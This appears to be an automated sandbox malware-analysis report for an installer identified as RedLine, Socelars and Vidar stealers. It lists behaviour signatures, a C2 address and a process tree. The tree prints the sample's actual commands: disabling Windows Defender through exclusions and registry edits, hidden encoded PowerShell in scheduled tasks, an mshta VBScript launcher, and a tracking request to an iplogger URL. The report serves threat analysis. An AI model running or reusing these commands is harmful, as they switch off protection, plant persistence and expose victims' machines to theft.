Resubmissions
23-09-2021 21:08
210923-zyzyaafbfr 1022-09-2021 10:40
210922-mqyzssehck 1022-09-2021 05:21
210922-f114ksecck 1021-09-2021 05:29
210921-f6zspsgdg2 1020-09-2021 21:51
210920-1qj3jafed9 1020-09-2021 19:44
210920-yftswafca9 1020-09-2021 08:28
210920-kczcasgahr 1020-09-2021 04:42
210920-fb3acafedj 1020-09-2021 04:42
210920-fb2zksfecr 10Analysis
-
max time kernel
1802s -
max time network
1806s -
platform
windows11_x64 -
resource
win11 -
submitted
22-09-2021 10:40
General
-
Target
setup_x86_x64_install.exe
-
Size
4.0MB
-
MD5
73491325fde5366b31c09da701d07dd6
-
SHA1
a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
-
SHA256
56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
-
SHA512
28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
janesam
C2
65.108.20.195:6774
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 24 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 44 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 64 IoCs
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks for any installed AV software in registry 1 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 9 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 6 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 30 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 24 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 53 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies data under HKEY_USERS 46 IoCs
-
Modifies registry class 5 IoCs
-
Modifies system certificate store 2 TTPs 8 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun1917b8fb5f09db8.exeSun1917b8fb5f09db8.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\m1dOwok5aPcrur45Ch_l6GVs.exe"C:\Users\Admin\Documents\m1dOwok5aPcrur45Ch_l6GVs.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1956 -s 2447⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\g4sLH6CA5afgxnFDnbN6julV.exe"C:\Users\Admin\Documents\g4sLH6CA5afgxnFDnbN6julV.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\i_mtShrQKXhCFkurByO6l9wD.exe"C:\Users\Admin\Documents\i_mtShrQKXhCFkurByO6l9wD.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\5cyMyMfaTHF5mm4GGWje7aCw.exe"C:\Users\Admin\Documents\5cyMyMfaTHF5mm4GGWje7aCw.exe"6⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6096 -s 3007⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\jRMIx4HYZwNMhmRfA3bxVT31.exe"C:\Users\Admin\Documents\jRMIx4HYZwNMhmRfA3bxVT31.exe"6⤵
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵
-
C:\Users\Admin\Documents\UqeNeCzEYzHh_NzaAB2UgDsH.exe"C:\Users\Admin\Documents\UqeNeCzEYzHh_NzaAB2UgDsH.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\UqeNeCzEYzHh_NzaAB2UgDsH.exe"C:\Users\Admin\Documents\UqeNeCzEYzHh_NzaAB2UgDsH.exe"9⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\GbT976WNIrFezJdOCBcbWAi7.exe"C:\Users\Admin\Documents\GbT976WNIrFezJdOCBcbWAi7.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\tmpCD2_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpCD2_tmp.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
-
C:\Users\Admin\AppData\Local\Temp\tmpCD2_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpCD2_tmp.exe10⤵
-
C:\Users\Admin\Documents\2TSNQ2xF4QX4VsNS94y7odig.exe"C:\Users\Admin\Documents\2TSNQ2xF4QX4VsNS94y7odig.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSFC38.tmp\Install.exe.\Install.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS184C.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRGvtOeSZ" /SC once /ST 02:34:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bOoGaaDxESFbryPOAb" /SC once /ST 03:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\xDbKBpA.exe\" tt /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\ynpFKcNZI9p6eFlM1OP158SD.exe"C:\Users\Admin\Documents\ynpFKcNZI9p6eFlM1OP158SD.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6324 -s 2609⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\f8PpilxAOrTr28KiG99opgqy.exe"C:\Users\Admin\Documents\f8PpilxAOrTr28KiG99opgqy.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6208 -s 2609⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\j9LG0SsntR5orv4gnEXhnbOy.exe"C:\Users\Admin\Documents\j9LG0SsntR5orv4gnEXhnbOy.exe"8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\UZE7zKuIOHTqCGibtYD11gl4.exe"C:\Users\Admin\Documents\UZE7zKuIOHTqCGibtYD11gl4.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\DVqoN_M2hyOJuqKLhZl3Zhf2.exe"C:\Users\Admin\Documents\DVqoN_M2hyOJuqKLhZl3Zhf2.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\YZb540BezbbpKeaGGc138FrF.exe"C:\Users\Admin\Documents\YZb540BezbbpKeaGGc138FrF.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2948 -s 17567⤵
- Program crash
-
C:\Users\Admin\Documents\QSydSxCGLaGDRZ1oU1LJVgeo.exe"C:\Users\Admin\Documents\QSydSxCGLaGDRZ1oU1LJVgeo.exe"6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\Kj_AL68Sdj9h6SyuSSPAb3y6.exe"C:\Users\Admin\Documents\Kj_AL68Sdj9h6SyuSSPAb3y6.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\Kj_AL68Sdj9h6SyuSSPAb3y6.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\l6unBCJnlLRYEZSAupPv3hRP.exe"C:\Users\Admin\Documents\l6unBCJnlLRYEZSAupPv3hRP.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "210921.exe" & start "" "Done.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"7⤵
-
C:\Users\Admin\AppData\Local\Temp\210921.exe"210921.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\Done.exe"Done.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"8⤵
- Blocklisted process makes network request
-
C:\Users\Admin\Documents\98zXQtfds9_B8K1wkYwThy5h.exe"C:\Users\Admin\Documents\98zXQtfds9_B8K1wkYwThy5h.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 2567⤵
- Program crash
-
C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe"C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScrIPt: CLoSe (cREATEobjEcT( "WscRIpt.SHEll" ). RUn ( "cMD.exe /q /c CoPY /Y ""C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe"" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh & If """" =="""" for %R IN ( ""C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe"" ) do taskkill -im ""%~nXR"" /f" , 0 , TRUE))7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c CoPY /Y "C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh & If "" =="" for %R IN ( "C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe" ) do taskkill -im "%~nXR" /f8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "AshFb0VOpmlvVISw0CGgF3Vv.exe" /f9⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXEY1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScrIPt: CLoSe (cREATEobjEcT( "WscRIpt.SHEll" ). RUn ( "cMD.exe /q /c CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE"" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh & If ""/pPcO7dQJSv4ebP1WI9YNCeWEF27pAh "" =="""" for %R IN ( ""C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE"" ) do taskkill -im ""%~nXR"" /f" , 0 , TRUE))10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c CoPY /Y "C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh & If "/pPcO7dQJSv4ebP1WI9YNCeWEF27pAh " =="" for %R IN ( "C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE" ) do taskkill -im "%~nXR" /f11⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" Z~DYVRL.v,IzgdZv10⤵
- Loads dropped DLL
-
C:\Users\Admin\Documents\MHxCwq6gfFJ_wz0KxIaVUa5d.exe"C:\Users\Admin\Documents\MHxCwq6gfFJ_wz0KxIaVUa5d.exe"6⤵
-
C:\Users\Admin\Documents\msSZ2vyO5kijQfy3iLE0ayRx.exe"C:\Users\Admin\Documents\msSZ2vyO5kijQfy3iLE0ayRx.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\DyzW75Vg9OFYpumqyTL2gvjP.exe"C:\Users\Admin\Documents\DyzW75Vg9OFYpumqyTL2gvjP.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\DyzW75Vg9OFYpumqyTL2gvjP.exe"C:\Users\Admin\Documents\DyzW75Vg9OFYpumqyTL2gvjP.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 10767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\nKgSrPTMItcaLsJo4r1XrMq6.exe"C:\Users\Admin\Documents\nKgSrPTMItcaLsJo4r1XrMq6.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSDCDE.tmp\Install.exe.\Install.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSF6CE.tmp\Install.exe.\Install.exe /S /site_id "394347"8⤵
- Checks BIOS information in registry
- Enumerates connected drives
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵
-
